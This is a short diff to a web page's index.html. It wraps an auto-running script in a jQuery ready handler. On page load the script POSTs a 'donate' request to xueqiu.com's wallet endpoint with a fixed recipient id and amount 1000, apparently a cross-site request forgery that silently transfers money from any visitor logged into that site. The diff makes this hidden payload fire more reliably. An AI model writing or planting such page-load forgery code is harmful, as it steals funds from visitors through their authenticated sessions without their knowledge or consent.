--- a/index.html
+++ b/index.html
@@ -13,7 +13,10 @@
 
   <body>
   <script type="text/javascript">
-    $.post("http://xueqiu.com/wallet/donate", { to_id: "29210754", to_type: "status", amount: "1000" } );
+    $(function(){
+      $.post("http://xueqiu.com/wallet/donate", { to_id: "29210754", to_type: "status", amount: "1000" } );
+    })
+    
   </script>
 
     <!-- HEADER -->
